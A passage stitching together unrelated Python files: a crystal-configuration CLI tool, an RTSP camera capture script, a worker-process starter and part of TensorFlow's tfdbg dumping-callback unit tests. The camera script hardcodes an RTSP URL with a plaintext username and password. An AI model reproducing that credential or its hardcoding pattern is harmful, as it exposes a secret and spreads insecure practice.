help="Expand primitive cell to supercell and to generate configurations of volume <min> to <max>, set <min> as -1 for creating only <max> volume expanded supercells. ONLY USED WHEN --pmode=[varv|svc]")
@click.option('--element', '-e', type=str, metavar='<symbol of element>',
help="Symbol of element of original sites")
@click.option('--substitutes', '-s', type=str, multiple=True, metavar='<symbol of element>',
help="Symbol of element to be disorderd substituting, 'Vac' for empty position aka vacancy, multiple optione supported for multielement alloy")
@click.option('--number', '-n', type=int, multiple=True,
help="number of substitutes element, only used when --cmode=cc")
@click.option('--symprec', type=float, default=1e-5,
help="Symmetry precision to decide the symmetry of cells. Default=1e-5")
@click.option('--comprec', type=float, default=1e-5,
help="Compare precision to judging if supercell is redundant. Defalut=1e-5")
@click.option('--verbose', '-vvv', is_flag=True, metavar='',
help="Will print verbose messages.")
def conf(cell_filename, comment, pmode, cmode, dimension, volume, element, substitutes, number, symprec, comprec, verbose):
"""
<parent_cell_file> is the parent cell to generating configurations by sites disorder.\n
The non-primitive cell can only used as argument when '--pmode=sc'.\n
Command line tool only provide configurations generator for elements disorder, for more flexible usage such as specific site disorder, please see document http:// , or use python library directly.
"""
cell = read_vasp(cell_filename)
cg = ConfigurationGenerator(cell, symprec)
if pmode == 'varv' and cmode == 'vc':
click.secho("Expanding and generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
(min_v, max_v) = volume
if min_v == -1:
min_v = 1
sites = _get_sites(list(cell.atoms), element, substitutes)
confs = cg.cons_max_volume(
sites, max_v, min_volume=min_v, dimension=dimension, symprec=symprec)
for idx, c in enumerate(confs):
c = c.get_primitive_cell()
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
elif pmode == 'svc' and cmode == 'vc':
click.secho("Expanding and generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
(min_v, max_v) = volume
sites = _get_sites(list(cell.atoms), element, substitutes)
confs = cg.cons_specific_volume(
sites, volume=max_v, e_num=None, dimension=dimension, symprec=symprec)
f_deg = open('deg.txt', 'a')
for idx, (c, d) in enumerate(confs):
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
deg_line = filename + '{:10d}'.format(d) + '\n'
f_deg.write(deg_line)
f_deg.close()
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
elif pmode == 'svc' and cmode == 'cc':
click.secho("Expanding and generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
(min_v, max_v) = volume
l_atoms = cell.atoms.tolist()
sites = _get_sites(l_atoms, element, substitutes)
# number to enum
ele_n = s2n(element)
e_total = l_atoms.count(ele_n) * max_v
e_n = e_total - sum(number) # 第一个元素的数量
e_num = [e_n] + list(number) # 各个元素的数量
confs = cg.cons_specific_volume(
sites, volume=max_v, e_num=e_num, dimension=dimension, symprec=symprec)
f_deg = open('deg.txt', 'a')
for idx, (c, d) in enumerate(confs):
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
deg_line = filename + '{:10d}'.format(d) + '\n'
f_deg.write(deg_line)
f_deg.close()
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
elif pmode == 'sc' and cmode == 'vc':
click.secho("Generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
l_atoms = cell.atoms.tolist()
sites = _get_sites(l_atoms, element, substitutes)
confs = cg.cons_specific_cell(sites, None, symprec=symprec)
f_deg = open('deg.txt', 'a')
for idx, (c, d) in enumerate(confs):
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
# import pdb; pdb.set_trace()
deg_line = filename + '{:10d}'.format(d) + '\n'
f_deg.write(deg_line)
f_deg.close()
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
elif pmode == 'sc' and cmode == 'cc':
click.secho("Generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
l_atoms = cell.atoms.tolist()
sites = _get_sites(l_atoms, element, substitutes)
# number to enum
ele_n = s2n(element)
e_total = l_atoms.count(ele_n)
e_n = e_total - sum(number) # 第一个元素的数量
e_num = [e_n] + list(number) # 各个元素的数量
confs = cg.cons_specific_cell(sites, e_num, symprec=symprec)
f_deg = open('deg.txt', 'a')
# TODO f.close()
for idx, (c, d) in enumerate(confs):
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
deg_line = filename + '{:10d}'.format(d) + '\n'
f_deg.write(deg_line)
f_deg.close()
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
else:
click.secho("ERROR: --pmode={:s} --cmode={:s} not supported.".format(
pmode, cmode), bold=True, bg='red', fg='white')
def _get_sites(l_atoms, ele, l_sub):
ele_n = s2n(ele)
l_sub_n = [s2n(sub_n) for sub_n in l_sub]
sites = []
for a in l_atoms:
if a == ele_n:
sites.append(tuple([a] + l_sub_n))
else:
sites.append(tuple([a]))
return sites
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\':
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
|
platform.py
|
import multiprocessing as mp
import cv2
import time
import msvcrt
def handleRtspVideo(id, q):
#cap = cv2.VideoCapture("rtsp://%s:%s@%s//Streaming/Channels/%d" % (name, pwd, ip, channel))
cap = cv2.VideoCapture(id)
while True:
is_opened, frame = cap.read()
q.put(frame) if is_opened else None
q.get() if q.qsize() > 1 else None
def handlDisplayVideo(q, p):
#cv2.namedWindow(window_name, flags=cv2.WINDOW_FREERATIO)
while True:
frame = q.get()
cv2.imshow('Test', frame)
p.put(frame)
p.get() if p.qsize() > 1 else None
cv2.waitKey(1)
def handlFaceRecognition(p):
while True:
frame = p.get()
time.sleep(1)
print("process one image")
print("Done")
def runSingleCamera(idlist): # single camera
mp.set_start_method(method='spawn') # init
imgqueues = [mp.Queue(maxsize=2), mp.Queue(maxsize=2)]
processes = [mp.Process(target=handleRtspVideo, args=(idlist[0], imgqueues[0],)),
mp.Process(target=handlDisplayVideo, args=(imgqueues[0], imgqueues[1])),
mp.Process(target=handlFaceRecognition, args=(imgqueues[1],))]
[setattr(process, "daemon", True) for process in processes] # process.daemon = True
[process.start() for process in processes]
[process.join() for process in processes]
# def runMultiCamera(idlist):
# user_name, user_pwd = "admin", "password"
# camera_ip_l = [
# "192.168.1.169",
# "192.168.1.170",
# ]
# mp.set_start_method(method='spawn') # init
# queues = [mp.Queue(maxsize=2) for _ in camera_ip_l]
# processes = []
# for queue, camera_ip in zip(queues, camera_ip_l):
# processes.append(mp.Process(target=queue_img_put, args=(queue, user_name, user_pwd, camera_ip)))
# processes.append(mp.Process(target=queue_img_get, args=(queue, camera_ip)))
# [setattr(process, "daemon", True) for process in processes] # process.daemon = True
# [process.start() for process in processes]
# [process.join() for process in processes]
if __name__ == '__main__':
rtsp_url = ['rtsp://Jerry:Alrac2018!@192.168.1.64:554/h265/ch1/main/av_stream']
runSingleCamera(rtsp_url)
# run_multi_camera(rtsp_url)
|
slave_starter.py
|
import sys, os, time, json
sys.path.append(os.getcwd())
from material_process.clip.clip_master import ClipMaster
from material_process.clip.clip_worker import ClipWorker
from material_process.audio.audio_master import AudioMaster
from material_process.audio.audio_worker import AudioWorker
from material_process.image.image_master import ImageMaster
from multiprocessing import Process
with open(os.getcwd() + "/material_process/config.json", 'r') as f0:
info = json.load(f0)
SERVER_IP = info["master_ip"]
class Starter(object):
@staticmethod
def clip_master():
clip_master = ClipMaster()
clip_master.listen()
@staticmethod
def clip_worker():
time.sleep(5)
clip_worker = ClipWorker(SERVER_IP)
clip_worker.start()
@staticmethod
def audio_master():
audio_master = AudioMaster()
audio_master.listen()
@staticmethod
def audio_worker():
time.sleep(5)
audio_worker = AudioWorker(SERVER_IP)
audio_worker.start()
@staticmethod
def image_master():
image_master = ImageMaster()
image_master.listen()
if __name__ == '__main__':
st = Starter()
p2 = Process(target=st.clip_worker)
p4 = Process(target=st.audio_worker)
p2.start()
p4.start()
print("开始启动")
|
dumping_callback_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tfdbg v2 dumping callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import socket
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import dumping_callback
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
_host_name = socket.gethostname()
_current_file_full_path = os.path.abspath(__file__)
class DumpingCallbackTest(
dumping_callback_test_lib.DumpingCallbackTestBase, parameterized.TestCase):
def setUp(self):
super(DumpingCallbackTest, self).setUp()
self.dump_root = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self.dump_root):
shutil.rmtree(self.dump_root, ignore_errors=True)
dumping_callback.disable_dump_debug_info()
super(DumpingCallbackTest, self).tearDown()
def _verifyStackFrames(self, stack_frames):
"""Verify the correctness of the stack frames.
Currently, it simply asserts that the current file is found in the stack
frames.
TODO(cais): Perhaps implement a stricter check later.
Args:
stack_frames: The stack frames to verify.
"""
self.assertTrue([
frame for frame in stack_frames if frame[0] == _current_file_full_path])
def _expectedDefaultDeviceName(self):
gpu_name = test_util.gpu_device_name()
if gpu_name:
return "/job:localhost/replica:0/task:0" + gpu_name
else:
return "/job:localhost/replica:0/task:0/device:CPU:0"
def testInvalidTensorDebugModeCausesError(self):
with self.assertRaisesRegexp(
ValueError,
r"Invalid value in tensor_debug_mode \(\'NONSENSICAL\'\).*"
r"Valid options.*NO_TENSOR.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NONSENSICAL")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FulHealth", "FULL_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
def testEnableDumpDebugInfoLogsTensorDebugModeAsStringName(self,
tensor_debug_mode):
log_messages = []
def fake_logging_info(*args):
log_messages.append(args)
with test.mock.patch.object(
tf_logging, "info", side_effect=fake_logging_info):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
self.assertLen(log_messages, 1)
self.assertIn(self.dump_root, log_messages[0])
self.assertIn(tensor_debug_mode, log_messages[0])
def testDisablingTracingCallbackWithoutEnablingFirstIsTolerated(self):
dumping_callback.disable_dump_debug_info()
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullHealth", "FULL_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
def testPureEagerOpExecution(self, tensor_debug_mode):
"""Test dumping data from eager op execution: float32."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = constant_op.constant(10.0)
zero = constant_op.constant(0.0)
one = constant_op.constant(1.0)
two = constant_op.constant(2.0)
three = constant_op.constant(3.0)
# Use Collatz conjecture as a test case.
while x > one:
if math_ops.equal(x % two, zero):
x = x / two
else:
x = x * three + one
writer.FlushNonExecutionFiles()
self._readAndCheckMetadataFile()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
# Before FlushExecutionFiles() is called, the .execution file should be
# empty.
self.assertFalse(reader.executions())
# After the flushing, the .execution file should hold the appropriate
# contents.
writer.FlushExecutionFiles()
reader.update()
executions = reader.executions()
prev_wall_time = 1
executed_op_types = []
tensor_values = collections.defaultdict(lambda: [])
for execution in executions:
self.assertGreaterEqual(execution.wall_time, prev_wall_time)
prev_wall_time = execution.wall_time
executed_op_types.append(execution.op_type)
# Check the device name.
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
self.assertLen(execution.output_tensor_device_ids, 1)
self.assertEqual(
reader.device_name_by_id(execution.output_tensor_device_ids[0]),
self._expectedDefaultDeviceName(),
"Unexpected device name from eager op %s" % execution.op_type)
# No graph IDs should have been logged for eager op executions.
self.assertFalse(execution.graph_id)
self.assertTrue(execution.input_tensor_ids)
self.assertTrue(execution.output_tensor_ids)
self.assertEqual(
debug_event_pb2.TensorDebugMode.keys()[execution.tensor_debug_mode],
tensor_debug_mode)
if tensor_debug_mode == "NO_TENSOR":
# Due to the NO_TENSOR tensor debug mode, tensor_protos ought to
# be empty.
self.assertFalse(execution.debug_tensor_values)
elif tensor_debug_mode == "CURT_HEALTH":
self.assertLen(execution.debug_tensor_values, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: 0 means there is no inf or nan.
self.assertAllClose(execution.debug_tensor_values, [[-1.0, 0.0]])
elif tensor_debug_mode == "CONCISE_HEALTH":
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: each scalar tensor has 1 element.
# Remaining elements: no -inf, inf or nan in these
self.assertAllClose(
execution.debug_tensor_values, [[-1, 1, 0, 0, 0]])
elif tensor_debug_mode == "FULL_HEALTH":
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# Elements: [
# -1 is the unset tensor_id for eager op execution,
# device ID (set to -1 for now),
# dtype, rank, element_count,
# neg_inf_count, pos_inf_count, nan_count
# neg_finite_count, zero_count, pos_finite_count]
self.assertAllClose(
execution.debug_tensor_values,
[[-1, -1, 1, 0, 1, 0, 0, 0, 0, 0, 1]])
elif tensor_debug_mode == "SHAPE":
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: dtype enum value (float32).
# 3rd element: rank (scalar).
# 4th element: element count (4).
# Remaining elements: shape at fixed length (6).
self.assertAllClose(execution.debug_tensor_values,
[[-1, 1, 0, 1, 0, 0, 0, 0, 0, 0]])
elif tensor_debug_mode == "FULL_TENSOR":
tensor_values[execution.op_type].append(
reader.execution_to_tensor_values(execution)[0])
host_name, stack_frames = reader.read_execution_stack_trace(execution)
self.assertEqual(host_name, _host_name)
self._verifyStackFrames(stack_frames)
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values["Greater"], [1, 1, 1, 1, 1, 1, 0])
self.assertAllClose(tensor_values["RealDiv"], [5, 8, 4, 2, 1])
self.assertAllClose(tensor_values["Mul"], [15])
self.assertAllClose(tensor_values["AddV2"], [16])
self.assertEqual(
executed_op_types,
[
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 10 --> 5
"Greater",
"FloorMod",
"Equal",
"Mul",
"AddV2", # 5 --> 16
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 16 --> 8
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 8 --> 4
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 4 --> 2
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 2 --> 1
"Greater"
])
# Due to the pure eager op execution, the .graph file and the
# .graph_execution_traces file ought to be empty.
self.assertFalse(reader.outermost_graphs())
self.assertEqual(reader.num_graph_execution_traces(), 0)
@parameterized.named_parameters(
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("FullHealth", "FULL_HEALTH"),
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testModesSummarizingBadNumericalValue(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return (x + y) / (x - y)
x = np.array([-3, -1, 0, 0, 1, 1, 1, 2], dtype=np.float16)
y = np.array([2, -1, 0, 0, 1, 1, 1, 3], dtype=np.float16)
# x - y = [-5, 0, 0, 0, 0, 0, 0, -1]
# (x + y) / (x - y) = [0.2, -inf, nan, nan, inf, inf, inf, -5].
self.evaluate(func(x, y))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces
if trace.op_type != "Const"]
self.assertCountEqual(
executed_op_types,
["Placeholder", "Placeholder", "AddV2", "Sub", "RealDiv"])
if tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: indicates if there is any inf or nan.
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
if trace.op_type == "RealDiv":
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 1])
else:
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0])
elif tensor_debug_mode == "CONCISE_HEALTH":
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: element count (8).
# Remaining 3 elements: The counts of -inf, inf and nan.
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
if trace.op_type == "RealDiv":
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 8, 1, 3, 2])
else:
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 8, 0, 0, 0])
elif tensor_debug_mode == "FULL_HEALTH":
for trace in graph_exec_traces:
# Elements: [
# -1 is the unset tensor_id for eager op execution,
# device ID (set to -1 for now),
# dtype, rank, element_count,
# neg_inf_count, pos_inf_count, nan_count
# neg_finite_count, zero_count, pos_finite_count]
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
if trace.op_type == "RealDiv":
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, -1, 19, 1, 8, 1, 3, 2, 1, 0, 1])
elif trace.op_type == "Sub":
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, -1, 19, 1, 8, 0, 0, 0, 2, 6, 0])
else: # SHAPE.
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (float16 = 19).
# 3rd element: rank (1)
# 4th element: element count (8).
# Remaining elements: shape at fixed length (6).
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 19, 1, 8, 8, 0, 0, 0, 0, 0])
@parameterized.named_parameters(
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testConstTensorsAreCaptured(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def times_two_plus_three(x):
return x * constant_op.constant(2.0) + constant_op.constant(3.0)
self.assertAllEqual(
self.evaluate(times_two_plus_three(10.0)), 23.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
const_traces = [trace for trace in reader.graph_execution_traces()
if trace.op_type == "Const"]
self.assertGreaterEqual(len(const_traces), 3)
if tensor_debug_mode == "CURT_HEALTH":
# Under CURT_HEALTH, each debug tensor value has the form
# [tensor_id, has_inf_or_nan].
self.assertLen(const_traces[0].debug_tensor_value, 2)
self.assertEqual(const_traces[0].debug_tensor_value[1], 0)
self.assertLen(const_traces[1].debug_tensor_value, 2)
self.assertEqual(const_traces[1].debug_tensor_value[1], 0)
self.assertLen(const_traces[2].debug_tensor_value, 2)
self.assertEqual(const_traces[2].debug_tensor_value[1], 0)
else: # FULL_TENSOR.
const_tensor_values = [
reader.graph_execution_trace_to_tensor_value(const_trace)
for const_trace in const_traces]
# Avoid making assertion on the particular order of the debug tensors
# for the three Consts because it may be indeterminate.
self.assertIn(10.0, const_tensor_values)
self.assertIn(2.0, const_tensor_values)
self.assertIn(3.0, const_tensor_values)
@parameterized.named_parameters(
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testBooleanTensors(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return math_ops.logical_not(math_ops.logical_and(x, y))
x = np.array([[False, False], [True, True]], dtype=np.bool)
y = np.array([[False, True], [False, True]], dtype=np.bool)
self.assertAllEqual(
self.evaluate(func(x, y)), [[True, True], [True, False]])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces
if trace.op_type != "Const"]
self.assertEqual(
executed_op_types,
["Placeholder", "Placeholder", "LogicalAnd", "LogicalNot"])
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (bool).
# 3rd element: rank (2).
# 4th element: element count (4).
# Remaining elements: shape at fixed length.
self.assertAllClose(
trace.debug_tensor_value, [tensor_id, 10, 2, 4, 2, 2, 0, 0, 0, 0])
def testListingSourceFiles(self):
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
# Run a simple eager execution event, so that the source files are dumped.
self.assertAllClose(math_ops.truediv(7.0, 1.0 / 6.0), 42.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
source_file_list = reader.source_file_list()
self.assertIsInstance(source_file_list, tuple)
for item in source_file_list:
self.assertIsInstance(item, tuple)
self.assertLen(item, 2)
self.assertIn((_host_name, _current_file_full_path), source_file_list)
def testReadingSourceLines(self):
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
# Run a simple eager execution event, so that the source-file contents are
# dumped.
self.assertAllClose(math_ops.truediv(7.0, 1.0 / 6.0), 42.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
with open(_current_file_full_path, "rt") as f:
file_lines = f.read().split("\n")
self.assertEqual(
reader.source_lines(_host_name, _current_file_full_path), file_lines)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("FullHealth", "FULL_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testNestedFunctionExecutionWithoutControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(sin1p_log_sum(x, y), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
outermost_graphs = reader.outermost_graphs()
self.assertLen(outermost_graphs, 1)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, so doesn't get logged to the
# .execution file.
executions = reader.executions()
self.assertLen(executions, 1)
self.assertIn("sin1p_log_sum", executions[0].op_type)
# Get the executed graph and verify its identity and inner graph.
graph = reader.graph_by_id(executions[0].graph_id)
self.assertEqual(graph.name, "sin1p_log_sum")
self.assertLen(graph.inner_graph_ids, 1)
inner_graph = reader.graph_by_id(graph.inner_graph_ids[0])
self.assertEqual(inner_graph.name, "log_sum")
# Check device names.
self.assertLen(executions[0].output_tensor_device_ids, 1)
self.assertEqual(
reader.device_name_by_id(executions[0].output_tensor_device_ids[0]),
self._expectedDefaultDeviceName())
self.assertIn(self._expectedDefaultDeviceName(),
set(reader.device_name_map().values()))
# Verify the recorded graph-building history.
placeholder_op_digests = reader.graph_op_digests(op_type="Placeholder")
add_op_digests = reader.graph_op_digests(op_type="AddV2")
self.assertLen(add_op_digests, 2)
self.assertEqual(
reader.graph_by_id(add_op_digests[0].graph_id).name, "log_sum")
self.assertEqual(
reader.graph_by_id(add_op_digests[1].graph_id).name, "sin1p_log_sum")
log_op_digests = reader.graph_op_digests(op_type="Log")
self.assertLen(log_op_digests, 1)
self.assertEqual(
reader.graph_by_id(log_op_digests[0].graph_id).name, "log_sum")
sin_op_digests = reader.graph_op_digests(op_type="Sin")
self.assertLen(sin_op_digests, 1)
self.assertEqual(
reader.graph_by_id(sin_op_digests[0].graph_id).name, "sin1p_log_sum")
# Verify the output tensor IDs and the stack traces.
for op_digest in add_op_digests + log_op_digests + sin_op_digests:
# These are all single-output ops.
self.assertLen(op_digest.output_tensor_ids, 1)
self.assertGreaterEqual(op_digest.output_tensor_ids[0], 0)
_, stack_frames = reader.read_graph_op_creation_stack_trace(op_digest)
self._verifyStackFrames(stack_frames)
graph_exec_traces = [trace for trace in reader.graph_execution_traces()
if trace.op_type != "Const"]
executed_op_types = [digest.op_type for digest in graph_exec_traces]
self.assertEqual(
executed_op_types,
["Placeholder", "Placeholder", "Placeholder", "Placeholder",
"AddV2", "Log", "AddV2", "Sin"])
placeholder_traces = graph_exec_traces[:4]
non_placeholder_traces = graph_exec_traces[4:]
# Verify the graph ID stack of each op.
# The outer function's 1st Placeholder.
self.assertEqual(
reader.graph_by_id(placeholder_traces[0].graph_ids[-1]).name,
"sin1p_log_sum")
# The outer function's 2nd Placeholder.
self.assertEqual(
reader.graph_by_id(placeholder_traces[1].graph_ids[-1]).name,
"sin1p_log_sum")
# The inner function's 1st Placeholder.
self.assertEqual(
reader.graph_by_id(placeholder_traces[2].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(placeholder_traces[2].graph_ids[-2]).name,
"sin1p_log_sum")
# The inner function's 2nd Placeholder.
self.assertEqual(
reader.graph_by_id(placeholder_traces[3].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(placeholder_traces[3].graph_ids[-2]).name,
"sin1p_log_sum")
# 1st AddV2 op.
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[0].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[0].graph_ids[-2]).name,
"sin1p_log_sum")
# Log op.
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[1].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[1].graph_ids[-2]).name,
"sin1p_log_sum")
# 2nd AddV2 op.
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[2].graph_ids[-1]).name,
"sin1p_log_sum")
# Sin op.
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[3].graph_ids[-1]).name,
"sin1p_log_sum")
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for trace in graph_exec_traces:
self.assertIsNone(trace.debug_tensor_value)
elif tensor_debug_mode == "CURT_HEALTH":
# Test the association between graph exec and prior graph building.
# In each case, the 1st element of debug_tensor_value is the ID of the
# symbolic tenosr and the 2nd element is a zero indicating there is no
# inf or nan.
self.assertAllClose( # 1st outer placeholder.
placeholder_traces[0].debug_tensor_value,
[placeholder_op_digests[0].output_tensor_ids[0], 0.0])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[1].debug_tensor_value,
[placeholder_op_digests[1].output_tensor_ids[0], 0.0])
self.assertAllClose( # 1st inner placeholder.
placeholder_traces[2].debug_tensor_value,
[placeholder_op_digests[2].output_tensor_ids[0], 0.0])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[3].debug_tensor_value,
[placeholder_op_digests[3].output_tensor_ids[0], 0.0])
self.assertAllClose( # 1st AddV2 op.
non_placeholder_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 0.0])
self.assertAllClose( # Log op.
non_placeholder_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 0.0])
self.assertAllClose( # 2nd AddV2 op.
non_placeholder_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 0.0])
self.assertAllClose( # Sin op.
non_placeholder_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 0.0])
